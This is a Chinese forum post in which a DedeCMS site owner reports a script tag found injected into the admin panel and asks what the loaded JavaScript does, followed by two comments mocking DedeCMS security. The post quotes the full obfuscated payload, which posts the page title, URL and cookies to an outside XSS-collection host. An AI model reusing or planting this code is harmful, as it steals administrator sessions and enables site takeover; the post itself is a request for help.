dede又中标了!?!?
今天打开dedecms后台,登录后跳转很慢,看到正在加载这个页面,http://xsser.so/
看了一下代码,居然在框架的head里加了这个:
<script src="http://t.cn/R2LgMPP" language="javascript" type="text/javascript"></script>
打开http://t.cn/R2LgMPP,实际地址是:http://xsser.so/index.php?u=4a89dc
显示内容是js代码:
var bid=421; var xingUrl='http://xsser.so/index.php'; eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}]; e=function(){return'[235-9b-df-np-u]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('x=c.x||{d:3(){5(c.j){8 2=f j()}k 5(c.g){l{8 2=f g("Msxml2.m")}n(e){l{8 2=f g("Microsoft.m")}n(e){}}}h 2},i:3(2,6){2.onreadystatechange=3(){5(2.readyState==4){5(2.status==200){5(6)allback(2.responseText)}}}},p:3(o){5(typeof(o)=='object'){8 7=''; for(a in o){7+=a+'='+o[a]+'&'}7=7.substr(0,7.length-1);h 7}k{h o}},q:3(9,6){2=x.d();2.r('q',9,s);2.t(null);x.i(2,6)},u:3(9,b,6){2=x.d();2.r('u',9,s); 2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');b=x.p(b);2.t(b);x.i(2,6)}}',[],31,'||ajax|function||if|callback|str|var|url||content|window|request||new|ActiveXObject|return|handle|XMLHttpRequest|else|try|XMLHTTP|catch||display|get|open|true|send|post'.split('|'),0,{})) x.post(xingUrl+"?a=info",{bid:bid,title:document.title,url:escape(document.URL),cookie:document.cookie});
请问这是什么鬼?js代码有什么危害?
如果你对这篇文章有疑问,欢迎到本站 社区 发帖提问或使用手Q扫描下方二维码加群参与讨论,获取更多帮助。

评论(9)

dede 本来就是做垃圾站的,就是用来被黑的,你还在乎这个干吗?
有一个很讽刺的事情,曾经的一个很大的PHP培训机构 php100,在2011年左右的时候因为用了dedeCMS,频繁被黑(比如:http://m.oschina.net/blog/28764),老脸都丢光了,最后无奈换了个CMS系统。

发布评论
需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。